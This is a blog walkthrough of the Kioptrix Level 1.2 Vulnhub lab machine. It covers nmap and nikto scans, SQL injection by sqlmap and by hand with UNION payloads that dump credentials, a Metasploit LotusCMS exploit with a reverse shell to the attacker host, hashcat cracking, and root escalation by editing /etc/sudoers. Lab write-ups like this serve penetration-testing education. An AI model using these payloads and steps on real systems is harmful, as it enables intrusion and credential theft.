Vulnhub – Kioptrix: Level 1.2 (#3)

Part 3 of the Kioptrix Series. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. Link to downloading the Vm can be found here. Lets get started!!

Description from author:

It’s been a while since the last Kioptrix VM challenge. Life keeps getting the way of these things you know.

After the seeing the number of downloads for the last two, and the numerous videos showing ways to beat these challenges. I felt that 1.2 (or just level 3) needed to come out. Thank you to all that downloaded and played the first two. And thank you to the ones that took the time to produce video solutions of them. Greatly appreciated.

As with the other two, this challenge is geared towards the beginner. It is however different. Added a few more steps and a new skill set is required. Still being the realm of the beginner I must add. The same as the others, there’s more then one way to “pwn” this one. There’s easy and not so easy. Remember… the sense of “easy” or “difficult” is always relative to ones own skill level. I never said these things were exceptionally hard or difficult, but we all need to start somewhere. And let me tell you, making these vulnerable VMs is not as easy as it looks…

Important thing with this challenge. Once you find the IP (DHCP Client) edit your hosts file and point it to kioptrix3.com

Under Windows, you would edit C:\Windows\System32\drivers\etc\hosts to look something like this:

# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com

Under Linux that would be /etc/hosts

There’s a web application involved, so to have everything nice and properly displayed you really need to this.

Hope you enjoy Kioptrix VM Level 1.2 challenge.

452 Megs

MD5 Hash : d324ffadd8e3efc1f96447eec51901f2

Have fun

Source: http://www.kioptrix.com/blog/?p=358

Starting the pentest

Kali Linux machine

 192.168.182.147 

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.153

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning and Reconnaissance

Running a scan with nmap I found OpenSSH 4.7p1 Debian 8ubuntu1.2 is running on port 22/tcp, and Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch) is running on port 80/tcp. Also, the Vm’s OS isLinux 2.6.X . I can probably guess from nmap that we will being some web exploitation.

root@kali:~# nmap -A -T4 192.168.182.153

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-02 00:00 CST
Nmap scan report for kioptrix3.com (192.168.182.153)
Host is up (0.00027s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:58:63:15 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms kioptrix3.com (192.168.182.153)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
root@kali:~# 

Running Nikto, i ccould see that the web server is running phpadmin, which is a free software tool written in PHP, intended to handle the administration of MySQL over the Web (I smell an SQL injection later in the pentest).

root@kali:~# nikto -host http://192.168.182.153/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.182.153
+ Target Hostname:    192.168.182.153
+ Target Port:        80
+ Start Time:         2017-03-02 00:24:51 (GMT-6)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 14:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7534 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2017-03-02 00:25:05 (GMT-6) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# 
 

I first went to the site and found out it was a blog. I already knew it had phpmyadmin because of the nikto scan, but I also found out it had a gallery.

After doing some browsing on the site, I found by going to “Ligoat Press Room” and by clicking on sorting options and photo id, I found that URL had a parameter of “id” which could signify a vulnerability to SQL injection. After putting ' after php?id=1 , the server gave us an SQL error. This site is vulnerable to a SQL injection!!

Last thing I did was check the login portal on blog site and found that it was using LotusCMS which is vulnerable to LotusCMS 3.0 eval() Remote Command Execution exploit.

Exploitation

The exploitation will be separated into 3 categories. The first will be doing a SQL injection with sqlmap, the second doing a SQL injection manually, and lastly, doing the LotusCMS 3.0 eval() Remote Command Execution Exploit. All 3 will produce the same results by getting the user credentials to the vulnerable vm (which will then be used to perform privilege escalation to get root).

SQLi using sqlmap

I will NOT be putting all the output from sqlmap! I did not want to dump so much info so i just showed the commands used and the important output. Just fyi! So now knowing that the web server is vulnerable to an SQL injection, I fired up sqlmap and ran the command below to enumerate DBMS databases.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dbs

Well 3 databases were available! I used the next command to see the tables on the gallery database.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id --tables -D gallery

Now we see 7 tables in the gallery database. Dev_accounts looks very interesting so lets dump all the database table entries and see what we find using the command below.

root@kali:~# sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump

From the tables we can see that we got the username and password hashes for dreg and loneferret. We can ssh into the victim’s machine using these credentials but after we crack the hashes. (You can skip all the way to “Password Cracking using hashcat” if you want unless you want to learn the other methods I used to get the passwords)

Manual SQLi

So now I will be doing a SQL injection but manually instead of using sqlmap. I used a tutorial which greatly helped me out which I recommend to you all called Hacking website using SQL Injection -step by step guide. If you have any questions to how and why I used a certain SQL statement just go to that tutorial which explains more in detail or just leave me comment.
So with that covered, lets get started! We know from checking the site earlier, that it is vulnerable to an SQL injection so what I want to know next is how many columns are listed in the database and as well which columns are vulnerable. I will use the command listed below for to get this information. NOTE: Make sure to put this after the id parameter in the URL.

-1  union select 1,2,3,4,5,6--

From the output we can tell that it has 6 columns with column 2 and column 3 being vulnerable(if you want to know more on how I got this, click on the link stated earlier). Next, I will try to find the version of the database. Since we knew that column 2 is vulnerable, we will be injecting our code into that column. I will use command listed below to show exactly how its done!

-1  union select 1,version(),3,4,5,6--

SQL 5.0.51a is a version of MySQL. We now know what type of syntax the database uses. Now we need to find what tables are located in the database and their names. We will inject using the query listed below.

-1  union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--


Tables Names:

Sweet! We have all the tables on the database so lets check out dev_accounts because that one looks the most interesting. I will inject using the query listed below. Note: The CHAR() portion of the query is the name of dev_accounts. We used the tool hackbar to do the conversion so we can get the query to work.

-1  union select 1,group_concat(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name=CHAR(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)--

Almost done! Lets get the database to give us the username and password using the injection query below.

-1  union select 1,group_concat(username,0x3a,password),3,4,5,6 From dev_accounts--

Bingo!! We got username and password hashes to dreg and loneferret. Now onto password cracking. (You can skip the next exploit if you want to continue on in the pentest or check out the Lotus exploit to see another way of exploiting this VM)

LotusCMS 3.0 eval() Remote Command Execution Exploit

I will use a metasploit module to for the LotusCMS 3.0 eval() Remote Command Execution exploit so we can get a shell.

msf > use exploit/multi/http/lcms_php_exec
msf exploit(lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf exploit(lcms_php_exec) > set RHOST 192.168.182.153
RHOST => 192.168.182.153
msf exploit(lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf exploit(lcms_php_exec) > set LHOST 192.168.182.147
LHOST => 192.168.182.147
msf exploit(lcms_php_exec) > set URI /
URI => /
msf exploit(lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.182.147:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.182.147:4444 -> 192.168.182.153:51095) at 2017-03-03 00:51:23 -0600

whoami
www-data

So we have a shell. Lets do some looking around.

pwd
/home/www/kioptrix3.com
ls -l
total 84
drwxrwxrwx  2 root root  4096 Apr 15  2011 cache
drwxrwxrwx  8 root root  4096 Apr 14  2011 core
drwxrwxrwx  8 root root  4096 Apr 14  2011 data
-rw-r--r--  1 root root 23126 Jun  5  2009 favicon.ico
drwxr-xr-x  7 root root  4096 Apr 14  2011 gallery
-rw-r--r--  1 root root 26430 Jan 21  2007 gnu-lgpl.txt
-rw-r--r--  1 root root   399 Feb 23  2011 index.php
drwxrwxrwx 10 root root  4096 Apr 14  2011 modules
drwxrwxrwx  3 root root  4096 Apr 14  2011 style
-rw-r--r--  1 root root   243 Aug  5  2010 update.php

The gallery directory looks interesting. Lets see what’s in there.

ls -l gallery
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php

I snooped around until i found in the gconfig.php file what we were looking for! I got the phpmyadmin credientials!

	$GLOBALS["gallarific_mysql_server"] = "localhost";
	$GLOBALS["gallarific_mysql_database"] = "gallery";
	$GLOBALS["gallarific_mysql_username"] = "root";
	$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

I input the credentials to get into the phpmyadmin application.

I then go to the gallery database. Then click on the SQL tab and enter the SQL query below.

SELECT * FROM dev_accounts


We Now have the usernames and password hashes for dreg and loneferret!

Password Cracking using hashcat

With the two passwords stored in hashes.txt I started up hashcat in order to break the passwords. The command to break the passwords is listed below.

root@kali:~# hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
5badcaf789d3d1d09794d8f021f40f0e:starwars                 
0d3eccfb887aabd50f243b3f155c0f85:Mast3r

We found that passwords were starwars and Mast3r!

Persistance(Linux Privilege Escalation)

Lets ssh into the victim’s VM using loneferret account.

root@kali:~# ssh loneferret@kioptrix3.com
The authenticity of host 'kioptrix3.com (192.168.182.153)' can't be established.
RSA key fingerprint is 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'kioptrix3.com,192.168.182.153' (RSA) to the list of known hosts.
loneferret@kioptrix3.com's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ 

Lets check the the CompanyPolicy.README file. That looks interesting! I also ran sudo -l and whereis ht commands to see some additional info.

loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.

DG
CEO
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ 
loneferret@Kioptrix3:~$ whereis ht
ht: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ 

Found a SUID binary! So this means as our current user loneferret , we can run the ht editor as sudo and edit any file we want! Lets edit the /etc/sudoers file then! Use the commmand listed below to get into the ht text editor. Once you run the command then press F3 and then add /etc/sudoers.

loneferret@Kioptrix3:~$ sudo ht

Ok once we are in the /etc/sudoers file add /bin/sh at the end where loneferret entry is at. Then press ALT+F to save and then CTRL+Z to exit.

Now run the following for root access sudo /bin/sh

loneferret@Kioptrix3:~$ sudo /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# hostname
Kioptrix3

Conclusion

This was hard compared to the first two and took me awhile to get root access. Took some basic SQL knowledge as well as some basic linux privilege techniques to do but I got it done. If you have any feedback you want to give, give a comment below. Well it just gets harder from here. On to the next one!

4 comments

  1. I drop a leave a response whenever I especially enjoy a article on a blog or if I have something to
    add to the discussion. It’s triggered by the sincerness communicated in the post I looked at.
    And on this post Vulnhub – Kioptrix: Level 1.2 (#3) – Guillermo Cura.
    I was excited enough to post a comment 😉 I do have a couple of questions for you if you tend not
    to mind. Could it be just me or do some of the remarks appear like they are coming from brain dead people?

    😛 And, if you are writing at other sites, I’d like to follow you.
    Could you list all of all your public pages like your linkedin profile, Facebook page or twitter feed?

    1. Thank You! I really do appreciate the positive feedback. Well we all started somewhere. Well most of my writing comes from this site only. I have been working on my github and writing programs from “Violent Python: A cookbook for hackers, forensic analysts, pentration testers, and security engineers,” so I will updating my site to show other things that I have been working on so don’t worry that will come soon. Yes I do have a linkedin(barely made one) and facebook which I will be posting later but I hardly post anything on fb and just use it a tool to keep up with friends and not for network security but I wouldn’t mind adding you. Once again thanks for the feedback and sorry for the late response. Been real busy lately with other things so haven’t had time to do much on my spare time.

    1. Thanks! Glad the material could help. Yea the material takes a good amount of effort to put together. As of right haven’t done any vms but will soon. Probably do some write ups on some ctfs ill be doing soon.

Leave a Reply

Your email address will not be published. Required fields are marked *